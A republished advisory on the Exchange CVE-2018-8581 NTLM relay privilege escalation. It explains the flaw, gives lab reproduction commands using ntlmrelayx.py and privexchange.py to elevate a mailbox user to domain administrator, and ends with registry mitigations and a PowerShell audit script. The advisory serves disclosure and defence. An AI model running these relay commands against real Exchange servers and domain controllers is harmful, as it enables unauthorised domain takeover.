
Exchange CVE-2018-8581 vulnerability advisory

2025-02-24 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article is an advisory on the Exchange CVE-2018-8581 vulnerability. The editor considers it very practical and shares it in the hope that readers will get something out of it. Let's take a look at it together.

Yesterday, the foreign security researcher dirkjanm published a blog post detailing the exploitation of a privilege escalation vulnerability in Exchange Server, tracked as CVE-2018-8581. The vulnerability had in fact already been disclosed in a technical blog post by the Zero Day Initiative (ZDI) in December of last year. It combines a server-side request forgery (SSRF) in Exchange with the high privileges under which Exchange issues those requests, so that a user holding valid mailbox credentials can be elevated to domain administrator privileges. Currently Microsoft has not released a patch for this vulnerability and only provides a mitigation, and that mitigation is not applicable to all Exchange servers.

Exchange Server is Microsoft's mail server. Beyond basic mail functionality, Exchange is tightly integrated with Active Directory Domain Services and with other Microsoft services and components. Given that Exchange accounts for a very high share of mail servers in enterprise environments, and that the scope of this vulnerability is relatively wide, users are asked to take the corresponding measures promptly.

Scope of impact of vulnerability

Exchange 2010 ~ Exchange 2016

Vulnerability impact

With mailbox user credentials in hand, an attacker can, under certain conditions, elevate an ordinary user to domain administrator privileges.

Vulnerability exploitation conditions

Exchange is in its default configuration and the attacker holds valid mailbox user credentials. Because exploitation relies on NTLM relay, the attacker must also already control a usable host in the intranet.

Brief description of the vulnerability

The vulnerability arises from several aspects:

First, Exchange allows any user, as long as they are authenticated, to create a push subscription (Push Subscription) through the EWS interface, and lets them specify an arbitrary URL as the destination to which notifications are pushed.

Second, once a push subscription exists and a push is triggered, Exchange sends the notification using the DefaultCredentials property of the CredentialCache class. Because EWS runs as SYSTEM, HTTP requests issued with DefaultCredentials perform NTLM authentication with that identity.

Third, by placing a SerializedSecurityContext in the header of an EWS request and specifying a SID, a caller can impersonate another identity, so that the EWS call is performed as the specified user.

Taken together, these problems let an ordinary mailbox user use EWS with high privileges to grant delegate access to, and read, any mailbox. These are the details of the vulnerability that ZDI first published in its blog.

Since the vulnerability involves NTLM relay, an obvious approach is to relay the credential to the domain controller, which is exactly what dirkjanm describes in his blog: relaying the NTLM authentication to the domain controller's LDAP service. Because the relayed NTLM credential belongs to the highest-privilege identity on the Exchange server, and that identity in turn holds the highest privileges in the domain, it can be used to elevate an ordinary user.

Vulnerability reproduction

10.0.83.11 is the attacker

10.0.83.93 is the domain control server

10.0.83.94 is the Exchange server

Execute the following commands (ntlmrelayx.py on the attacker host first, then privexchange.py):

ntlmrelayx.py -t ldap://10.0.83.93 --escalate-user wangwu

privexchange.py -ah 10.0.83.11 -u wangwu -p password --debug -d fb.com 10.0.83.94

Once ntlmrelayx.py is waiting for the request, either trigger the notification push manually or wait for the push to time out. The output then shows that wangwu has successfully been elevated to domain administrator.

Mitigation measures

Microsoft's official mitigation at the time was to delete the DisableLoopbackCheck value from the registry:

reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableLoopbackCheck /f

From the standpoint of mitigating the attack, SMB signing can also be enabled on the domain controller, which is an effective way to prevent NTLM relay attacks. The details are as follows. This fix actually restricts NTLM relay, so this kind of attack can be alleviated to a certain extent. Its drawback is that it is ineffective when the Exchange server roles are installed split, that is, when the Mailbox server role and the Client Access server role are not installed on the same server.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters

Under the registry location above, add the values EnableSecuritySignature and RequireSecuritySignature, set both to 1, and restart the operating system.
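The following PowerShell audit script is an added example written for this article; it is not from the advisory, from Microsoft or from dirkjanm. It reads back the registry state that the two mitigations above depend on, using exactly the paths and value names given in the article, and optionally applies the domain-controller SMB signing setting. The LDAPServerIntegrity check is an addition not mentioned in the article: the reproduction relays to the domain controller's LDAP service, and SMB signing does not cover that path, so the script also reports whether LDAP signing is required. The function names are this example's own.

```powershell
# Added example, not code from the article or from Microsoft.
# Run elevated: the Lsa check matters on the Exchange server, the LanManServer
# and NTDS checks matter on the domain controller.

function Get-RegDword {
    param([string]$Path, [string]$Name)
    # Returns the DWORD value, or $null when the value (or key) is absent.
    try {
        $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop
        return [int]$item.$Name
    } catch {
        return $null
    }
}

function Test-PrivExchangeMitigations {
    $results = @()

    # 1. Microsoft's mitigation: DisableLoopbackCheck must be deleted (absent), or at least 0.
    $lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $loopback = Get-RegDword -Path $lsa -Name 'DisableLoopbackCheck'
    $current = if ($null -eq $loopback) { 'absent' } else { $loopback }
    $results += [pscustomobject]@{
        Check   = 'DisableLoopbackCheck removed (Exchange server)'
        Current = $current
        Pass    = ($null -eq $loopback -or $loopback -eq 0)
    }

    # 2. The article's domain-controller setting: both SMB signing values set to 1.
    $lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters'
    foreach ($name in 'EnableSecuritySignature', 'RequireSecuritySignature') {
        $v = Get-RegDword -Path $lanman -Name $name
        $current = if ($null -eq $v) { 'absent' } else { $v }
        $results += [pscustomobject]@{
            Check   = "$name = 1 (domain controller, SMB signing)"
            Current = $current
            Pass    = ($v -eq 1)
        }
    }

    # 3. Not in the article: the reproduction relays to LDAP, which SMB signing does not
    #    protect. LDAPServerIntegrity = 2 makes the domain controller require LDAP signing.
    $ntds = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
    $ldap = Get-RegDword -Path $ntds -Name 'LDAPServerIntegrity'
    $current = if ($null -eq $ldap) { 'absent' } else { $ldap }
    $results += [pscustomobject]@{
        Check   = 'LDAPServerIntegrity = 2 (domain controller, LDAP signing required)'
        Current = $current
        Pass    = ($ldap -eq 2)
    }

    return $results
}

function Enable-SmbSigningRequired {
    # Applies the article's domain-controller setting. A restart is required afterwards,
    # as the article states. Set-ItemProperty creates the values if they do not exist.
    $lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters'
    foreach ($name in 'EnableSecuritySignature', 'RequireSecuritySignature') {
        Set-ItemProperty -Path $lanman -Name $name -Value 1 -Type DWord
    }
    Write-Host 'SMB signing values set to 1; restart the operating system to apply.'
}

# Usage: audit first, then apply on the domain controller if the SMB checks fail.
Test-PrivExchangeMitigations | Format-Table -AutoSize
# Enable-SmbSigningRequired
```

The audit intentionally treats an absent DisableLoopbackCheck as a pass, because the article's mitigation is to delete that value rather than to set it. Run it on each Exchange server and on each domain controller separately, since the checks are per-host registry state and nothing in the script reaches across the network.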

That is the Exchange CVE-2018-8581 vulnerability advisory. The editor believes it contains knowledge points that we may encounter or use in our daily work, and hopes you can learn more from this article. For more details, please follow the industry information channel.
